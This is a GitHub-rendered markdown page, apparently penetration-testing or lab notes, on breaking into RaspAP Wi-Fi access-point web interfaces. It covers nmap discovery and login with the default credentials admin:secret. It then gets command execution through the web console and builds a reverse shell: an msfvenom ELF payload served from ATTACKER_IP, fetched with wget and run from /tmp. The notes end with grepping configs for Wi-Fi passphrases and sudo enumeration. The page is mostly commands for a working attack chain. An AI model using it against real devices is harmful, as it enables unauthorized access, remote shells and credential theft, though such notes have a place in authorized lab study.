Skip to content

Latest commit

 

History

History
70 lines (48 loc) · 1.24 KB

File metadata and controls

70 lines (48 loc) · 1.24 KB

RaspAP

RaspAP is a web interface for managing Wi-Fi access points. It commonly runs under lighttpd with HTTP Basic Auth.

Discovery

nmap -sC -sV TARGET -p 8091
# 8091/tcp open  http  lighttpd
# http-auth: Basic realm=RaspAP

Browse to:

http://TARGET:8091/

Default Credentials

admin:secret

Web Console

After login, check for a system info or console page:

/index.php?page=system_info

The console may execute commands as the web server user:

id
pwd
ls -la /home

If the web console is awkward for reverse shell metacharacters, upload and run a small ELF payload:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f elf -o shell.elf
python3 -m http.server 8000

From the web console:

wget -O /tmp/shell.elf http://ATTACKER_IP:8000/shell.elf
chmod +x /tmp/shell.elf
/tmp/shell.elf &

Interesting Files

Search RaspAP config for Wi-Fi and service credentials:

grep -r -i "pass\|password\|wpa" /var/www/html/config/

Common hit:

hostapd.conf:wpa_passphrase=ChangeMe

Also check sudo -l; RaspAP installs often grant web-facing users service-management commands such as systemctl start/stop hostapd or dnsmasq.